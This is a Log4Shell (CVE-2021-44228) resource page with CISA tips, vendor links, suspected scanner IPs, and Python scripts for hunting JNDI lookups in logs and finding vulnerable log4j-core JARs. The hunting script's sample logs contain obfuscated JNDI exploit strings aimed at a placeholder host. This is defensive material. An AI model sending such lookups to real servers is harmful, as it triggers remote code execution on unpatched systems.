Log4j Resources

The following is a running list of resources for addressing the Log4j vulnerability (CVE-2021-44228, "Log4Shell"); it is updated as new guidance appears. For ongoing discussions and updates, please consider joining the Colorado Threat Information Sharing group as soon as possible – https://colorado-crc.com/colorado-network/

Need to speak with Colorado experts? We can help put you in touch. Simply email us at Colorado-CRC@cyber-center.org

Key Resources

Apache Log4j Vulnerability Guidance | CISA

GitHub community page for vulnerability status and recommendations: https://github.com/cisagov/log4j-affected-db 

Report any attacks to: https://us-cert.cisa.gov/forms/report

Sign up for CISA’s free Cyber Hygiene vulnerability scanning services – email vulnerability_info@cisa.dhs.gov to start the process!

https://canarytokens.org/generate# (Generate a DNS canary token and put its hostname in a JNDI lookup string in test input. If a vulnerable Log4j instance processes that input, it resolves the hostname and the token fires, confirming that the library is present and performing lookups.)

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes (File hashes of the affected log4j-core JAR files, for searching file systems for vulnerable copies)

https://securityblue.team/log4j-hunting-and-indicators/

https://www.randori.com/blog/cve-2021-44228/

https://www.lunasec.io/docs/blog/log4j-zero-day

Cloudflare WAF Blocks: https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

Citrix Web Application Firewall – Proven, Robust Security for your Web Applications – Solution Brief: https://www.citrix.com/content/dam/citrix/en_us/documents/solution-brief/citrix-web-application-firewall-proven-robust-security-for-your-web-applications.pdf

Citrix Guidance for Reducing Apache Log4j Vulnerability: https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/

QRadar: https://community.ibm.com/community/user/security/blogs/adam-frank/2021/12/13/detection-of-log4shell-using-qradar

https://www.trustedsec.com/blog/log4j-playbook/
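The hunting guides linked above (Security Blue Team, TrustedSec, the QRadar write-up) all come down to the same check: find `${jndi:` in request logs while allowing for the nested-lookup tricks attackers use to hide the word. The following is an added example, not code from any of the linked resources: Python detection logic run over a handful of constructed web-server log lines (hypothetical traffic pointing at documentation-range addresses). It URL-decodes each line, resolves the `${lower:}`, `${upper:}` and `${...:-default}` lookup forms innermost-first, then reports the source address, scheme, target host and port of every JNDI lookup it finds, so the output can feed a block list or a SIEM query. The regular expressions, field names and sample lines are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (hypothetical traffic, not real data).
# Lines 1, 2, 3 and 5 carry a JNDI lookup; 2, 3 and 5 hide the word "jndi"
# with nested Log4j lookups (line 5 is also URL-encoded); line 4 is benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.6 - - [11/Dec/2021:03:14:09 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.10/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.7 - - [11/Dec/2021:03:14:11 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}"',
    '10.0.0.8 - - [11/Dec/2021:03:15:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:15:30 +0000] "POST /api HTTP/1.1" 200 10 "-" '
    '"%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A//203.0.113.10/d%7D"',
]

# Obfuscating lookup forms. Each pattern matches only a lookup with no further
# "${" inside it, so repeated application resolves nested lookups innermost-first.
_LOWER = re.compile(r"\$\{\s*lower\s*:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{\s*upper\s*:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${env:X:-j} or ${::-j} -> j
# A resolved lookup: ${jndi:<scheme>://<host>[:port]...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s:]+)(?::(\d+))?", re.I)


def normalize(text, max_rounds=10):
    """Undo URL encoding and the lookup tricks that hide the literal "jndi"."""
    for _ in range(max_rounds):
        new = unquote(text)                                   # %24%7B -> ${
        new = _LOWER.sub(lambda m: m.group(1).lower(), new)   # ${lower:J} -> j
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)   # ${upper:j} -> J
        new = _DEFAULT.sub(lambda m: m.group(1), new)         # ${env:X:-j} -> j
        if new == text:
            return new
        text = new
    return text  # gave up after max_rounds; whatever is left is still searched


def hunt(lines):
    """Return one finding per JNDI lookup in the given log lines."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        for m in _JNDI.finditer(norm):
            end = norm.find("}", m.end())
            findings.append({
                "line": lineno,
                "src": raw.split(" ", 1)[0],          # first field of a combined-format line
                "scheme": m.group(1).lower(),
                "host": m.group(2),
                "port": int(m.group(3)) if m.group(3) else None,
                # True when the plain string was absent from the raw line, i.e. the
                # attacker relied on nesting or encoding to get past a naive grep.
                "obfuscated": "${jndi:" not in raw.lower(),
                "lookup": norm[m.start():end + 1 if end != -1 else None],
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOGS):
        print(f)
```

Point `hunt()` at real lines (for example `hunt(open("/var/log/nginx/access.log"))`) and group the findings by `src` and `host`: the source addresses are candidates for the block list, and the lookup targets are the attacker infrastructure worth searching for in outbound DNS and LDAP logs. Lookups that arrive in headers other than User-Agent are caught the same way, since the whole line is searched.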

CISA Tips

1. Scan your devices and applications to see if you are using Log4j version 2.0-beta9 through 2.14.1. Log4j is usually bundled inside other software (JAR/WAR files, appliances, vendor products), so check the CISA affected-software list as well as your own code. Prioritize external, Internet-facing applications and devices, then move on to internal applications and devices once the external ones have been addressed.

2. Upgrade to version 2.15.0 (the fixed release current when this list was written) as soon as possible. Check Apache's Log4j security page for the latest fixed release before you patch, since Apache has published further releases that supersede 2.15.0.

DO NOT QUIT at this point! Continue the following steps!

3. Make sure your Security Operations Center is actioning every alert from devices that are, or were, running vulnerable Log4j versions. A device patched today may have been exploited before the patch went on.

4. Make sure your web app firewalls are updated with the newest rules

5. Review your change control, because sophisticated actors may patch behind you: an attacker who has already gained access may apply the fix themselves to keep others out, so a patch you cannot account for is a sign of compromise, not of a job done.

6. Lower the threshold for information sharing – If You See Something, Say Something!

7. Make sure your Cyber Hygiene request to CISA has been submitted – vulnerability_info@cisa.dhs.gov
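Step 1 (find every copy of Log4j in the affected range, including copies bundled inside other archives) and the hash list linked under Key Resources both come down to opening archives and checking what is inside them. The following is an added example in Python, not CISA's or any vendor's tool: it walks a directory tree, opens every JAR/WAR/EAR it finds (recursing into archives nested inside archives), reads the log4j-core version from the Maven pom.properties, compares it with the 2.0-beta9 through 2.14.1 range stated above, and reports the SHA-256 of JndiLookup.class so it can be checked against a published hash list. The `demo()` function builds a constructed application tree of fake JARs (real member layout, fake class bytes) in a temporary directory so the example runs offline; the version-ranking rule and the status labels are this example's own.

```python
import hashlib
import io
import os
import re
import tempfile
import zipfile

# Members of a log4j-core JAR that identify the library and its version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 4  # JARs inside WARs inside EARs; stop at a sane depth
_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.I)


def parse_version(text):
    """'2.0-beta9', '2.0-rc2', '2.14.1' -> comparable tuple (pre-releases rank below finals)."""
    m = _VERSION.match(text.strip())
    if not m:
        return None
    major, minor, patch, tag, num = m.groups()
    rank = {"beta": 0, "rc": 1}.get((tag or "").lower(), 2)   # ranking rule chosen for this example
    return (int(major), int(minor), int(patch or 0), rank, int(num or 0))


# The affected range named in the CISA tips: 2.0-beta9 through 2.14.1.
VULN_LOW = parse_version("2.0-beta9")
VULN_HIGH = parse_version("2.14.1")


def is_vulnerable_version(text):
    v = parse_version(text)
    return v is not None and VULN_LOW <= v <= VULN_HIGH


def inspect_archive(data, label, findings, depth=0):
    """Inspect one ZIP-format archive held in memory, recursing into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else None
        has_jndi = JNDI_CLASS in names
        if version is None:
            status = "UNKNOWN VERSION"       # no pom.properties: inspect by hand
        elif not is_vulnerable_version(version):
            status = "NOT IN RANGE"          # outside 2.0-beta9..2.14.1
        elif has_jndi:
            status = "VULNERABLE"
        else:
            status = "JNDI CLASS REMOVED"    # in-range version with the class stripped; confirm it was deliberate
        findings.append({"archive": label, "version": version, "status": status,
                         "jndi_sha256": hashlib.sha256(zf.read(JNDI_CLASS)).hexdigest() if has_jndi else None})
    if depth < MAX_NESTING:
        for member in names:
            if member.lower().endswith(ARCHIVE_EXTS):
                inspect_archive(zf.read(member), f"{label}!{member}", findings, depth + 1)


def scan_path(root):
    """Walk a directory tree and inspect every archive in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXTS):
                path = os.path.join(dirpath, fname)
                try:
                    with open(path, "rb") as fh:
                        inspect_archive(fh.read(), path, findings)
                except OSError:
                    continue  # unreadable file: skip it rather than abort the scan
    return sorted(findings, key=lambda f: f["archive"])


def build_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core JAR: real member layout, fake class bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe fake JndiLookup " + version.encode())
    return buf.getvalue()


def demo():
    """Scan a constructed application tree written to a temporary directory."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    war = io.BytesIO()  # a WAR bundling a vulnerable log4j-core one level down
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", build_sample_jar("2.13.3"))
    files = {"lib/log4j-core-2.14.1.jar": build_sample_jar("2.14.1"),
             "lib/log4j-core-2.15.0.jar": build_sample_jar("2.15.0"),
             "lib/log4j-core-2.14.0-stripped.jar": build_sample_jar("2.14.0", include_jndi=False),
             "app.war": war.getvalue()}
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return scan_path(root)
```

Run `demo()` to see the four statuses on the constructed tree, or `scan_path("/opt")` (or any application root) for a real host. A filename-only search misses the copy inside `app.war`, which is why the scanner recurses; "NOT IN RANGE" only means the version is outside the range on this page, so still compare it with Apache's current advisory, and a "JNDI CLASS REMOVED" result deserves a look at change control, per tip 5, if nobody on your side removed it.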

  • Palo Alto Firewall IDS/IPS Tips

    • Palo Alto released an emergency update (version 8499) on 12/10 containing the Log4j signatures. There was one more update released yesterday (version 8500). For each policy that is created in Palo Alto, there is an option to enable "Vulnerability Protection", which is customizable but should reset the critical threat connections by default. In order for this to work for others, they would need the 8500 update, a valid Threat Prevention license, and Vulnerability Protection enabled on their policies. We think it looks at unencrypted traffic strings for the blocking.

  • CrowdStrike Tips

  • Fortinet Firewall IDS/IPS Tips

  • Additional IP addresses that may be scanning for the vulnerability (submitted by a Colorado county)

199.249.230.69

209.141.54.195

138.68.250.214

159.89.150.150

165.227.32.109

159.89.133.216

178.128.226.212

159.89.146.147

68.183.198.36

138.197.106.234

143.198.183.66

138.197.72.76

138.197.108.154

68.183.192.239

128.199.15.215

147.182.216.21

142.93.157.150

138.197.167.229

159.89.48.173

137.184.106.119

137.184.104.73

68.183.198.247